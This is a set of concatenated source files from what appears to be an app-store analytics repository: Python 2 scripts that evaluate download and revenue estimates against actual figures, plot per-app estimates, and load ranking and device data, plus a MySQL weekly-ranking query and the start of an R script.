    Use the Kolmogorov-Smirnov statistic to test whether the CDFs of actuals
    and estimates come from the same distribution.
    If they do, it could mean the estimates are accurate.
ks_stat[0] is the K-S statistic, smaller values are better
ks_stat[1] is the p-value, higher values are better
"""
if 'sbe' in df.columns:
df = df[['date', 'store_id', 'app_id', 'feed_id', 'sbe', 'units']]
actuals = select_downloads_or_usd(df, ['date', 'store_id', 'app_id', 'units'], unit).dropna()
sbe = select_downloads_or_usd(df, ['date', 'store_id', 'app_id', 'sbe'], unit).dropna()
ks_stat = ks_2samp(actuals['units'], sbe['sbe'])
else:
df = df[['date', 'store_id', 'app_id', 'feed_id', 'estimate', 'units']]
actuals = select_downloads_or_usd(df, ['date', 'store_id', 'app_id', 'units'], unit).dropna()
sbe = select_downloads_or_usd(df, ['date', 'store_id', 'app_id', 'estimate'], unit).dropna()
ks_stat = ks_2samp(actuals['units'], sbe['estimate'])
return ks_stat
def plot_sbe_vs_actuals(df, plots_dir, model_name):
df = df[['units', 'sbe']].drop_duplicates()
full_dir = '%s/%s'%(plots_dir, model_name)
plt.clf()
ax = plt.subplot(111)
p1, = plt.plot(df['units'], df['sbe'], 'r.', alpha=0.4)
p1, = plt.plot(df['units'], df['units'], 'b.', alpha=0.4)
ax.set_xscale('log')
ax.set_yscale('log')
#title= '%s_%s_%s_%s_%s_%s_%s_curve'%(name[0], country_dict[name[1]], name[2],category_dict[name[2]], market_dict[name[3]], type_dict[name[3]], model_name)
#plt.title(title)
plt.savefig('%s/%s.png'%(full_dir, 'test'))
pass
def gen_by_curve(df, estimates, other, unit='downloads', period='daily', model_name=None):
df = append_estimates(df, estimates, unit)
df = append_sbe(df, unit)
plots_dir = '%s/plots'%DATA_DIR
if not os.path.exists(plots_dir):
os.makedirs(plots_dir)
#This detects universally ranked apps and tags them in the universal column (Process intensive)
#df = append_universal(df)
#This saves file to csv
#df.to_csv('%s_%s_%s_%s_estimates_actuals_sbe.csv'%(month, country, model_name, unit), index=False)
#This plots all the curves (Process intensive)
plot_daily_curve(df, plots_dir, model_name)
#plot_sbe_vs_actuals(df, plots_dir, model_name)
#This plots series of actuals, for reference
#plot_app_series(df,top=app_top, which=unit, what='sbe', fig_file='%s/%s_%s_%s_%s_sbe_per_app.png'%(plots_dir, month, country, model_name, unit))
#plot_app_series(df, top=app_top, which=unit, what='units', fig_file='%s/%s_%s_%s_%s_actuals_per_app.png'%(plots_dir, month, country, model_name, unit))
df = append_diff(df)
gdf = df.groupby(['date', 'store_id', 'category_id', 'feed_id'])
#gdf = df.groupby(['date', 'store_id'])
for name, group in gdf:
name = list(name)
#name.append('ALL')
#name.append('ALL')
#Here we generate the metrics
estimates_std = compare_estimates(group)
ks_stat = compare_distributions(group, unit)
actuals_count = group[group['units']>0]['app_id'].drop_duplicates().shape[0]
if 'sbe' in group.columns:
estimates_count = group[group['sbe']>0]['app_id'].drop_duplicates().shape[0]
else:
estimates_count = group[group['estimate']>0]['app_id'].drop_duplicates().shape[0]
m_20_top20 = error_ratio(group, 0.2, rank_range=[0,20])
m_20_top200 = error_ratio(group, 0.2, rank_range=[0,200])
        m_10_100_top200 = error_ratio(group, 0.1, 100, rank_range=[0,200])  # top 200, matching the metric column name
score_80_20 = error_ratio(group, 0.2, rank_range=[201,1000])
big_error_score = error_ratio(group, 0.1, 100)
#metrics = get_error_metrics(group, [1,1000])
r1_20_metrics = get_error_metrics(group, [0,20])
r21_200_metrics = get_error_metrics(group, [21,200])
r201_1000_metrics = get_error_metrics(group, [201,1000])
repeated_by_date = repetition_ratio(group, 'date')
repeated_by_rank = repetition_ratio(group, 'rank')
#plot_actuals_vs_estimates(df, fig_file='%s_%s_%s_%s_vs_estimates.png'%(month, country, model_name, unit), which=unit, rank_range=[1,1000])
#if df['date'].drop_duplicates().shape[0]>1:
# median_7_acf = median_autocorrelation(estimates, which=unit, expected_cycle=7, by='rank', fig_file='%s/%s_%s_%s_%s_autocorrelation.png'%(plots_dir, month, country, model_name, unit))
# median_7_daily = median_autocorrelation(estimates, which=unit, expected_cycle=7, by='date', fig_file='%s/%s_%s_%s_%s_daily_autocorrelation.png'%(plots_dir, month, country, model_name, unit))
result = []
result.append(m_20_top20)
result.append(m_20_top200)
result.append(m_10_100_top200)
result.append(score_80_20)
result.append(big_error_score)
result.append(repeated_by_date)
result.append(repeated_by_rank)
#result.append(median_7_acf)
result.append(r1_20_metrics[4])
result.append(r1_20_metrics[5])
result.append(r1_20_metrics[6])
result.append(r21_200_metrics[4])
result.append(r21_200_metrics[5])
result.append(r21_200_metrics[6])
result.append(r201_1000_metrics[4])
result.append(r201_1000_metrics[5])
result.append(r201_1000_metrics[6])
result.append(actuals_count)
result.append(estimates_count)
result.append(estimates_std)
result.append(ks_stat[0])
result.append(ks_stat[1])
result.append(name[0])
result.append(name[1])
result.append(name[2])
result.append(name[3])
result.append(other)
result.append(period)
row = pd.DataFrame([result], columns=METRIC_COLUMNS)
METRICS[0] = METRICS[0].append(row, ignore_index=True)
METRICS[0].to_csv(OUT_FILE, index=False)
return result
def only_public_apps(df):
df = df[df['app_id'].isin(public_company_apps)]
return df
def run_loop(country, month, date=None, other=None):
use = month
if date is not None:
use = date
daily_actuals_downloads = pd.read_csv('%s/real_units_%s_%s_Downloads.csv'%(REFERENCES_DIR, country, month))
daily_actuals_usd = pd.read_csv('%s/real_units_%s_%s_USD.csv'%(REFERENCES_DIR, country, month))
select = 6
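    # Hard-coded model selector: only the branch matching `select` runs (6 = lowess).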
if select==1:
model_name = 'sliding_window_0'
daily_estimates = load_estimates(ESTIMATES_DIR, month, country)
if select==2:
model_name = 'original'
daily_estimates = load_estimates(ESTIMATES_DIR, month, country)
if select==3:
model_name = 'bertrand'
df = pd.read_csv('/Users/perezrafael/appannie/data/2012-07_Bertrand.csv')
daily_estimates = pd.read_csv('/Users/perezrafael/appannie/data/data_science/2012-07_Bertrand.csv')
if select==4:
model_name = 'sliding_window_0_curves_2'
daily_estimates = load_estimates(ESTIMATES_DIR, month, country)
if select==5:
model_name = 'sliding_window_0_curves_0_no_top_newpl'
daily_estimates = load_estimates(ESTIMATES_DIR, month, country)
if select==6:
model_name = 'lowess%s'%other
app_ids = load_estimates( '%s/cache/raw_estimation_original'%DATA_DIR, use, country)
app_ids = app_ids[['app_id', 'category_id', 'rank', 'date', 'feed_id', 'store_id']]
daily_estimates = load_estimates(ESTIMATES_DIR, use, country, other)
daily_estimates = daily_estimates.drop('app_id', axis=1).drop('date', axis=1)
#daily_estimates = daily_estimates.merge(app_ids, on=['category_id', 'rank', 'date', 'feed_id', 'store_id'])
daily_estimates = daily_estimates.merge(app_ids, on=['category_id', 'rank', 'feed_id', 'store_id'])
#daily_estimates = only_public_apps(daily_estimates)
#daily_actuals_downloads = only_public_apps(daily_actuals_downloads)
#daily_actuals_usd = only_public_apps(daily_actuals_usd)
monthly_estimates = daily_estimates.groupby(['store_id', 'category_id', 'feed_id', 'app_id'])
monthly_estimates = monthly_estimates.agg({'estimate' : np.sum,
'rank' : np.median})
monthly_estimates = monthly_estimates.reset_index()
monthly_estimates['date'] = month
monthly_actuals_downloads = daily_actuals_downloads.groupby(['app_id']).sum().reset_index()
monthly_actuals_downloads['date'] = month
monthly_actuals_usd = daily_actuals_usd.groupby(['app_id']).sum().reset_index()
monthly_actuals_usd['date'] = month
if date is None:
print '========= MONTHLY DOWNLOADS ==============================='
res = gen_by_curve(monthly_actuals_downloads, monthly_estimates, other, 'downloads', 'monthly', model_name)
print '========= MONTHLY USD ====================================='
res = gen_by_curve(monthly_actuals_usd, monthly_estimates, other, 'usd', 'monthly', model_name)
else:
print '========= DAILY DOWNLOADS ================================='
res = gen_by_curve(daily_actuals_downloads, daily_estimates, other, 'downloads', 'daily', model_name)
print '========= DAILY USD ======================================='
res = gen_by_curve(daily_actuals_usd, daily_estimates, other, 'usd', 'daily', model_name)
if __name__ == '__main__':
for country in COUNTRIES:
print '========= %s ==============================='%country
#for f in np.arange(0.1, 0.6, 0.1):
#for f in np.arange(0.01, 1, 0.01):
start = time.time()
#print '========= %s ==============================='%f
CURRENT_COUNTRY = country
run_loop(country, MONTH, DATE)
print 'That took %.5fs'%(time.time() - start)
METRICS[0].to_csv(OUT_FILE, index=False)<file_sep>/plotting/plot_single_app.py
'''
Created on May 6, 2013
@author: perezrafael
'''
import pandas as pd
from pandas.io import sql
import numpy as np
import matplotlib.pyplot as plt
import psycopg2
import config
import os
import datetime as dt
import matplotlib.dates as mdates
from os import listdir
from os.path import isfile, join
import string
import unicodedata
import re
def slugify(value):
#value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\w\s-]', '-', value).strip().lower())
value = unicode(re.sub('[-\s]+', '-', value))
return value
def get_app_names(df, platform):
if platform == 'ios':
conn = psycopg2.connect("dbname=aa user=aa host=nile")
app_ids = df['app_id'].values
query = 'SELECT id as app_id, name FROM aa_app WHERE id in (%s)'%','.join(str(x) for x in app_ids)
elif platform == 'android':
conn = psycopg2.connect("dbname=aa_android user=aa host=nile")
app_ids = df.apply(lambda x: "'%s'"%x['app_id'], axis=1).values
query = 'SELECT class as app_id, name FROM app WHERE class in (%s)'%','.join(str(x) for x in app_ids)
app_names = sql.frame_query(query, con=conn)
df = df.merge(app_names, on='app_id')
conn.close()
return df
def get_top_apps(df, top, category):
df = df[df['category_id']==category]
df = df[df['rank']<=top]
return df[['app_id']].drop_duplicates()
def load_estimates(input_dirs, top_rank=None, category=None, apps=None):
dfs = []
models = sorted(input_dirs.keys())
for model in models:
for f in listdir(input_dirs[model]):
if not f.endswith('.csv'):
continue
path = join(input_dirs[model],f)
if isfile(path):
df = pd.read_csv(path)
f_data = f.split('_')
df['model'] = model
if 'store_id' not in df.columns.values:
df['store_id'] = int(f_data[0])
if 'date' not in df.columns.values:
f_datab = f.split('-')
df['date'] = '%s-%s-%s'%(f_datab[1], f_datab[2], f_datab[3].split('.')[0])
if 'USD' in f_data:
df['unit'] = 'usd'
if 'Downloads' in f_data:
df['unit'] = 'downloads'
if top_rank is not None:
try:
df = df[df['rank']<=top_rank]
except:
continue
if category is not None:
try:
df = df[df['category_id']==category]
except:
continue
if apps is not None:
df = df.merge(apps, on='app_id', how='inner')
dfs.append(df)
dfs = pd.concat(dfs)
return dfs
def generate_sbe(df, platform):
    iphone_downloads = df[(df['feed_id']==0) | (df['feed_id']==1)]
    iphone_revenue = df[df['feed_id']==2]
    ipad_downloads = df[(df['feed_id']==100) | (df['feed_id']==101)]
    ipad_revenue = df[df['feed_id']==102]
    iphone_downloads = _calculate_sbe(iphone_downloads)
    iphone_downloads['unit'] = 'downloads'
    iphone_downloads['device'] = 'iphone'
    iphone_revenue = _calculate_sbe(iphone_revenue)
    iphone_revenue['unit'] = 'usd'
    iphone_revenue['device'] = 'iphone'
    ipad_downloads = _calculate_sbe(ipad_downloads)
    ipad_downloads['unit'] = 'downloads'
    ipad_downloads['device'] = 'ipad'
    ipad_revenue = _calculate_sbe(ipad_revenue)
    ipad_revenue['unit'] = 'usd'
    ipad_revenue['device'] = 'ipad'
    df = pd.concat([iphone_downloads, iphone_revenue, ipad_downloads, ipad_revenue])
return df
def _calculate_sbe(df):
print("Calculating SBE...")
if df.shape[0] == 0:
return pd.DataFrame()
try:
df.drop('category_id', axis=1, inplace=True)
except:
pass
grouped = df.groupby(['model', 'store_id', 'app_id', 'feed_id', 'date',])
categories_aggregated = grouped.mean()
categories_aggregated = categories_aggregated.reset_index()
print("Categories aggregated")
feeds_aggregated = categories_aggregated.drop('feed_id', axis=1).groupby(['model', 'store_id', 'app_id', 'date']).sum()
print("Feeds aggregated")
return feeds_aggregated.reset_index()
def plot_estimates(df, platform):
df['f_date'] = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in df['date']]
gdf = df.groupby(['name', 'store_id', 'unit', 'device'])
for n, g in gdf:
#app_name = n[0]
app_name = slugify(n[0])
if platform == 'ios':
country_name = config.IOS_STORES_DICT[int(n[1])]
elif platform=='android':
country_name = config.ANDROID_STORES_DICT[int(n[1])]
plt.clf()
fig = plt.figure()
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
models = []
p = []
gdf2 = g.groupby('model')
for n2, g2 in gdf2:
pa, = plt.plot(g2['f_date'].values, g2['estimate'], '-')
p.append(pa)
models.append(n2)
plt.gcf().autofmt_xdate()
plt.ylim(0, g['estimate'].max()*1.2)
ax.grid()
#plt.ylim(g['estimate'].min()*0.9, g['estimate'].max()*1.5)
device = n[3]
if platform == 'android':
device = 'android'
ax.set_title('%s - %s - %s'%(app_name, country_name, device))
ax.set_ylabel(n[2])
ax.legend(p, models)
plt.savefig('%s/%s_%s_%s_%s.png'%(PLOTS_DIR, app_name, device, n[2], country_name))
#plt.show()
if __name__ == '__main__':
units = ['USD', 'Downloads']
platform = 'android'
category = 1
month = '2013-02'
PLOTS_DIR = '/Users/perezrafael/appannie/data_science/plotting/plots/top_apps_top_10_overall_%s_webui_%s'%(platform,month)
if not os.path.exists(PLOTS_DIR):
os.makedirs(PLOTS_DIR)
#countries = [143441,143465,143466,143462,143444]
input_files = {'original_%s'%month:'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_original/%s/est_daily_raw'%(platform, month),
'dynamic_%s'%month:'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_dynamic/%s/est_daily_raw'%(platform, month),
'preview_%s'%month:'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_preview/%s/est_daily_raw'%(platform, month)}
#input_dirs = {
#'original':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily/2013-02/est_daily_raw',
#'original_universals':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily_universals/2013-02/est_daily_raw',
#'lowess':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily_lowess/2013-02/est_daily_raw',
#'lowess_universals':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily_lowess_universals/2013-02/est_daily_raw',
# 'web_ui': '/Users/perezrafael/appannie/data/%s_webui/%s'%(platform, MONTH),
# 'wew_ui_dynamic': '/Users/perezrafael/appannie/data_science/evaluation/ios_/daily_sbe_ratios/%s'%MONTH,
# 'wew_ui_preview': '/Users/perezrafael/appannie/data/daily_sbe_ratios/%s'%MONTH}
#input_dir = '/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily/2013-02/est_daily_raw'
top_apps = load_estimates({'original':'/Users/perezrafael/appannie/data_science/evaluation/data/%s/%s/est_daily_raw'%(platform, month)}, top_rank=10, category=category)[['app_id']].drop_duplicates()
#top_apps = pd.DataFrame({'app_id': [432494037]})
#top_apps = load_estimates(input_dirs, top_rank=10, category=36)[['app_id']].drop_duplicates()
df = load_estimates(input_files, apps=top_apps)
#df = load_estimates({'web_ui': '/Users/perezrafael/appannie/data/%s_webui/%s'%(platform, MONTH)}, apps=top_apps)
df = generate_sbe(df, platform)
#if platform == 'ios':
#df21 = load_estimates({'web_ui_using_ratios': '/Users/perezrafael/appannie/data/daily_sbe_ratios_iphone/%s'%MONTH}, apps=top_apps)[['store_id', 'app_id', 'date', 'estimate', 'unit', 'model']]
#df21['device'] = 'iphone'
#df22 = load_estimates({'web_ui_using_ratios': '/Users/perezrafael/appannie/data/daily_sbe_ratios_ipad/%s'%MONTH}, apps=top_apps)[['store_id', 'app_id', 'date', 'estimate', 'unit', 'model']]
#df22['device'] = 'ipad'
#df = pd.concat([df,df21,df22])
#elif platform == 'android':
#df = df.drop('device', axis=1)
#df2 = load_estimates({'web_ui_using_ratios': '/Users/perezrafael/appannie/data/daily_sbe_ratios_android/%s'%MONTH}, apps=top_apps)[['store_id', 'app_id', 'date', 'estimate', 'unit', 'model']]
#df = pd.concat([df,df2])
#df['device'] = 'android'
df = get_app_names(df, platform)
plot_estimates(df, platform)
#for country in countries:
# for unit in units:
# plot_country(country, unit, 'ios')
<file_sep>/evaluation/py/join_lowess_est.py
'''
Created on Mar 27, 2013
@author: perezrafael
'''
import os
import sys
import os.path
from collections import defaultdict
import pandas as pd
def main():
print(sys.argv)
original_dir = sys.argv[1]
lowess_dir = sys.argv[2]
output_dir = sys.argv[3]
if not os.path.exists(output_dir):
os.makedirs(output_dir)
#input_dirs = _listdir_with_fullpath(lowess_dir) + _listdir_with_fullpath(original_dir)
original_paths = _listdir_with_fullpath(original_dir)
lowess_paths = _listdir_with_fullpath(lowess_dir)
g = _group_est_and_real(original_paths, lowess_paths)
for (group_name, files) in g:
#lowess_df = _read_daily_lowess(files[1:])
lowess_df = pd.concat(map(pd.read_csv, files[1:]))
lowess_df = lowess_df.drop(['store_id','universal'], axis=1)
original_df = pd.read_csv(files[0]).drop('estimate', axis=1)
lowess_df = lowess_df.merge(original_df, on=['category_id', 'feed_id', 'rank', 'date'], how='inner')
lowess_df = lowess_df.sort_index(by=['date', 'category_id', 'feed_id', 'rank'])
lowess_df.to_csv(os.path.join(output_dir, group_name), index=False)
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
def _read_daily_lowess(paths):
dfs = []
for s in paths:
date = os.path.basename(s).split('_')[2][:10]
df = pd.read_csv(s)
df['date'] = date
dfs.append(df)
return pd.concat(dfs)
def _group_est_and_real(original_paths, lowess_paths):
# Corresponding est and real values should have the same base name.
# Despite that they're in different dirs.
d = defaultdict(list)
for s in original_paths:
arr_s = os.path.basename(s).split('_')[:2]
d[os.path.basename(s)].append(s)
for s2 in lowess_paths:
arr_s2 = os.path.basename(s2).split('_')[:3]
if arr_s[0] == arr_s2[0] and arr_s[1] == arr_s2[2]:
d[os.path.basename(s)].append(s2)
return d.iteritems()
def _load_dfs_from_paths(paths):
    # Read and concatenate all CSVs into a single frame.
    df = pd.concat(map(pd.read_csv, paths))
    return df
def _merge_lowess_and_original(dfs):
# @note: Use inner join, because we only care the case where we have
# estimation and real values.
dfs[1] = dfs[1].drop('estimate', axis=1)
merged = pd.merge(*dfs, on=['category_id', 'feed_id', 'rank'], how='inner')
return merged.sort_index(by=['date'])
if __name__ == '__main__':
main()
<file_sep>/ranking_change/test_variation.py
'''
Created on Aug 19, 2013
@author: perezrafael
'''
import pandas as pd
import csv
import matplotlib.pyplot as plt
def test_things(df):
gdf = df.groupby(['App ID', 'App Name']).std().reset_index()
#result = []
# g['std'] = g['Value'].std()
# del g['Value']
# g = g.drop_duplicates()
# result.append(g)
#result = pd.concat(result)
return gdf
def main():
metadata_f = '/Users/perezrafael/appannie/data/debug_files_with_subscription_and_universal_apps/US_Games_debug_2013-08-01_to_2013-08-14.csv'
df = pd.read_csv(metadata_f)
df = df[df['Feed']=='IPHONE_GROSSING']
df = df[['App ID', 'App Name', 'Day', 'Value']]
df = df.drop_duplicates()
#df = df[df['Value']>0]
# df = df.dropna()
df = df.sort(['App ID', 'Day'])
result = test_things(df)
result = result.sort('Value', ascending=False)
result.to_csv('data/crazy/res.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
for n, g in df.groupby(['App ID', 'App Name']):
plt.clf()
plt.plot(g['Value'])
plt.ylim(0, 135000)
plt.savefig('plots/crazy/%s.png'%str(n))
#plt.plot(result['Value'], '.', alpha=0.4)
#plt.show()
if __name__ == '__main__':
main()<file_sep>/audience/legacy_experiments/populate_review_categories.py
import pandas as pd
import psycopg2
import os
import datetime
import bz2
import calendar
import itertools
RANK_FILES_PATH = '/mnt/data/ranks'
CATEGORIES = [36, 100] + range(6000, 6019) + range(6020, 6024) + range(7001, 7020) + range(360, 364)
def load_ranks_file(path, store_ids=None, ranking_category_str_filter=None):
"""Load ranks from files"""
filename = os.path.split(path)[1]
assert filename.startswith('ranking_')
assert filename.endswith('.sql.bz2')
filename_date_str = filename[len('ranking_'):-len('.sql.bz2')]
#print filename_date_str
filename_date = datetime.datetime.strptime(filename_date_str, '%Y-%m-%d').date()
if ranking_category_str_filter is None:
ranking_category_str_filter = frozenset(map(str, CATEGORIES))
else:
ranking_category_str_filter = frozenset(ranking_category_str_filter)
f = bz2.BZ2File(path, 'r')
dfs = []
for line in f:
assert line.startswith(filename_date_str)
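        # Line format: date \t store_id \t category_id \t feed_id \t <space-separated app_ids>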
line_split = line.split('\t')
#print len(line_split)
ranking_date_str, ranking_store_str, ranking_category_str, ranking_feed_str, ranking_list_str_unsplit = line_split
if ranking_category_str not in ranking_category_str_filter:
continue
if ranking_feed_str == '3':
continue
if ranking_feed_str == '4':
continue
store_id = ranking_store_str
category_id = ranking_category_str
feed_id = ranking_feed_str
assert ranking_list_str_unsplit.endswith('\n')
ranking_list_str_split = ranking_list_str_unsplit.rstrip().split(' ')
df = pd.DataFrame(ranking_list_str_split).reset_index()
df.rename(columns={0:'app_id', 'index':'rank'}, inplace=True)
#df['rank'] += 1
#df['date'] = ranking_date_str
#df['store_id'] = store_id
df['category_id'] = category_id
#df['feed_id'] = feed_id
#print df.head()
dfs.append(df)
f.close()
dfs = pd.concat(dfs)
dfs = dfs[['app_id', 'category_id']].drop_duplicates()
return dfs
def main():
year = '2014'
months = ['01', '02', '03', '04', '05', '06']
#days = map(str, range(1, 32))
days = ['02', '03', '04', '05', '06', '08', '09']
for month, day in itertools.product(months, days):
last_day = calendar.monthrange(int(year),int(month))[1]
period_start = '{}-{}-01'.format(year, month)
period_end = '{}-{}-{}'.format(year, month, last_day)
filepath = '{}/ranking_{}-{}-{}.sql.bz2'.format(RANK_FILES_PATH, year, month, day)
        if not os.path.isfile(filepath):
continue
ranks_df = load_ranks_file(filepath, store_ids=['143441'])
print filepath
#print ranks_df.head()
conn = psycopg2.connect("dbname=aa_reviews user=aa host=10.38.48.144 port=5432")
cur = conn.cursor()
query = 'INSERT INTO app_category VALUES (%s, %s, %s, %s)'
for row in ranks_df.iterrows():
app_id = row[1]['app_id']
category_id = row[1]['category_id']
if app_id == '':
continue
if category_id == '':
continue
params = (app_id, category_id, period_start, period_end, )
#print query
try:
cur.execute(query, params)
conn.commit()
except Exception, e:
#print "Couldn't do it: %s" % e
#print 'repeated', params
pass
conn.close()
if __name__ == '__main__':
main()<file_sep>/aa_au_model/lib/import_data.py
import datetime
import glob
import numpy as np
import pandas as pd
import warnings
from config import BUCKET_DIR
from config import ISO_CODE
from config import DATATYPE_BUCKET_DATA_DIRS
from config import DATATYPE_COLUMN_NAMES
from config import DOWNLOAD_TYPES
def datetime_from_unixtimestamp(unixtimestamp):
"""
Convert unix timestamp to datetime
:param unixtimestamp:
:return: a datetime object
"""
timestamp_in_seconds = np.floor(int(unixtimestamp) / 1000)
return datetime.datetime.fromtimestamp(timestamp_in_seconds)
def date_from_unixtimestamp(unixtimestamp):
"""
Convert unix timestamp to datetime
:param unixtimestamp:
:return: a date object
"""
timestamp_in_seconds = np.floor(int(unixtimestamp) / 1000)
return datetime.date.fromtimestamp(timestamp_in_seconds)
def import_data_filepaths(data_type, filepaths):
"""
:param data_type: should be either 'ingest', 'session', 'download', 'connection', 'device_info', 'dpi_apps' or 'pause'
:param filepaths: array of filepaths to import
:return: data frame
"""
column_names = DATATYPE_COLUMN_NAMES[data_type]
def load_data_from_file(file_path):
compression = 'gzip' if file_path.endswith('gz') else None
try:
data = pd.read_csv(file_path, delimiter='\t', header=None, names=column_names,
compression=compression, index_col=False)
except IOError:
data = None
warnings.warn("Error loading file: {}\n Continuing loading the rest...".format(file_path),
RuntimeWarning)
return data
df = pd.concat([load_data_from_file(f) for f in filepaths if f], ignore_index=True)
return df
def import_data_filedirs(data_type, filedirs):
"""
:param data_type: should be either 'ingest', 'session', 'download', 'connection', 'device_info', 'dpi_apps' or 'pause'
:param filedirs: array of filedirs to import
:return: data frame
"""
df = pd.DataFrame()
for file_dir in filedirs:
file_paths = glob.glob(file_dir + '/part*')
if file_paths:
df = df.append(import_data_filepaths(data_type, file_paths), ignore_index=True)
else:
warnings.warn("No file named 'part*' found in folder {}".format(file_dir), RuntimeWarning)
return df
def import_data(startdate, enddate, data_type, bucketdir=BUCKET_DIR, iso_code=ISO_CODE):
"""
Import the data for a specified data type and date range.
:param startdate: startdate formatted like 'yyyymmdd'
:param enddate: enddate formatted like 'yyyymmdd'
:param data_type: should be either 'ingest', 'session', 'download', 'connection', 'device_info' or 'pause'
:param bucketdir: Path to bucket dir
:param iso_code: Country to load data from (if applicable for data_type)
:return: DataFrame containing the imported data
"""
base_path = bucketdir + DATATYPE_BUCKET_DATA_DIRS[data_type] + '/'
if data_type in ('connection', 'device_info', 'pause', 'session'):
base_path += iso_code + '/'
filedirs = map(lambda x: base_path + pd.to_datetime(x).strftime('%Y-%m-%d') + '/',
pd.date_range(start=startdate, end=enddate))
df = import_data_filedirs(data_type, filedirs)
if data_type == 'session':
df['startdatetime'] = pd.to_datetime(np.floor(df.startTime / 1000), unit='s')
df['enddatetime'] = pd.to_datetime(np.floor(df.endTime / 1000), unit='s')
df['startdate'] = df.startdatetime.dt.date
df['duration'] = (df.endTime - df.startTime) / 1000
df['weeknumber'] = df.startdatetime.dt.week
elif data_type == 'pause':
df['start_at_datetime'] = df.start_timestamp.apply(lambda x: -1 if x == -1 else datetime_from_unixtimestamp(x))
df['end_at_datetime'] = df.end_timestamp.apply(lambda x: -1 if x == -1 else datetime_from_unixtimestamp(x))
elif data_type == 'connection':
df['start_at_datetime'] = df.start_timestamp.apply(datetime_from_unixtimestamp)
df['end_at_datetime'] = df.end_timestamp.apply(datetime_from_unixtimestamp)
elif data_type == 'download':
df['datetimestamp'] = df.timestamp.apply(datetime_from_unixtimestamp)
df['date'] = df.timestamp.apply(date_from_unixtimestamp)
df['download_type'] = df.download_type.apply(lambda x: DOWNLOAD_TYPES[x])
return df
def import_connect_pause_per_day(startdate, enddate, data_type, bucketdir=BUCKET_DIR, iso_code=ISO_CODE):
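    """
    Build a per-device daily activity table from 'connection' or 'pause' records.
    Every calendar day between a record's start and end timestamps marks the
    device as active; after daily resampling, gap days get active=False.
    """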
    base_path = bucketdir + DATATYPE_BUCKET_DATA_DIRS[data_type] + '/' + iso_code + '/'
filedirs = map(lambda x: base_path + pd.to_datetime(x).strftime('%Y-%m-%d') + '/',
pd.date_range(start=startdate, end=enddate))
df = pd.DataFrame()
for filedir in filedirs:
print filedir
filepaths = glob.glob(filedir + '/part*')
print filepaths
if filepaths:
data = import_data_filepaths(data_type, filepaths)
data['start_at_date'] = data.start_timestamp.apply(lambda x: datetime_from_unixtimestamp(x).replace(hour=0,
minute=0,
second=0))
data['end_at_date'] = data.end_timestamp.apply(lambda x: datetime_from_unixtimestamp(x).replace(hour=0,
minute=0,
second=0))
data = (data[['device_id', 'start_at_date', 'end_at_date']].drop_duplicates()
.reset_index()[['device_id', 'start_at_date', 'end_at_date']])
data_start_end = data.reset_index()
data_start_end.columns = ['idz', 'device_id', 'start_at_date', 'end_at_date']
results_per_day = (data_start_end.set_index(['idz', 'device_id'])
.stack().reset_index()[['idz', 'device_id', 0]])
results_per_day.columns = ['idz', 'device_id', 'date']
results_per_day.set_index('date', inplace=True)
results_per_day = results_per_day.groupby(['idz']).resample('1d', how='count').reset_index()
results = pd.merge(data_start_end, results_per_day, on='idz',
suffixes=('', '_count'))[['device_id', 'date']].drop_duplicates()
df = df.append(results, ignore_index=True)
df = df.drop_duplicates()
df['active'] = 1
df = df.set_index('date').sort('device_id').groupby('device_id').resample('1d', how='count')
df['active'] = df.active.apply(lambda x: True if x == 1 else False)
return df
<file_sep>/top-app-stability/Distimo_data_queries/Android_estimates_per_week.sql
DROP TEMPORARY TABLE IF EXISTS temp.weeks;
CREATE TEMPORARY TABLE temp.weeks
(CONSTRAINT PRIMARY KEY (date, start_date))
SELECT
adddate(date, INTERVAL 1 DAY) as date,
date_sub(adddate(date, INTERVAL 1-DAYOFWEEK(date_sub(date, interval 1 day)) DAY), interval 1 day) as start_date
FROM
estimates.application_data_market
WHERE
date >= '2014-07-28' and date <= '2014-08-03'
GROUP BY date;
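-- Rank apps per (week, store, feed) by their summed estimate. This MySQL
-- version has no ROW_NUMBER(), so the inner query emulates it with the
-- @rank/@prev session variables: @rank increments while the
-- (start_date, appstore_instance_id, type) triple is unchanged and resets
-- to 1 when it changes.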
DROP temporary table IF EXISTS temp.market_top_est;
CREATE temporary TABLE temp.market_top_est
(CONSTRAINT PRIMARY KEY (start_date,iso_code,feed,rank))
SELECT
start_date,
cn.iso_code,
IF(x1.type='gross','revenue',x1.type) as feed,
rank,
estimate
FROM (
SELECT
start_date,
appstore_instance_id,
type,
estimate,
IF(
(@prev=CONCAT('1','-',x.start_date,'-',x.appstore_instance_id,'-',x.type)),
@rank:=@rank+1,
((@prev:=CONCAT('1','-',x.start_date,'-',x.appstore_instance_id,'-',x.type)) AND (@rank:=1))
) AS rank
FROM(
SELECT
w.start_date,
e.appstore_instance_id,
e.application_id,
e.type,
sum(e.estimate) as estimate
FROM
estimates.application_data_market e
JOIN temp.weeks w
ON w.date = e.date
GROUP BY w.start_date, appstore_instance_id,application_id, type
ORDER BY w.start_date, appstore_instance_id, type, estimate DESC
) x, (SELECT @rank:=1, @prev:='') dummy
) x1
JOIN market.appstore_instances ai
ON ai.id = x1.appstore_instance_id
JOIN appstore.countries cn
ON cn.id = ai.country_id
WHERE rank <= 50;
INSERT INTO aa_benchmarking_android.stability_weekly_aggregated
SELECT
    *
FROM
    temp.market_top_est;
###################################
### Load packages ###
### Load user defined functions ###
### Call main code ###
###################################
############################## START LOAD PREREQUISITES #####################################################
#################
# clear memory #
#################
#rm(list=ls())
#################
# load user_def #
#################
source("~/r_scripts/user_def.R")
#################################### END LOAD PREREQUISITES ##################################################
##############################################################################################################
##############################################################################################################
##############################################################################################################
################################## START GLOBAL VARIABLES ####################################################
##############################
# select start and end dates #
##############################
startDate = "2015-01-11"
endDate = "2015-01-17"
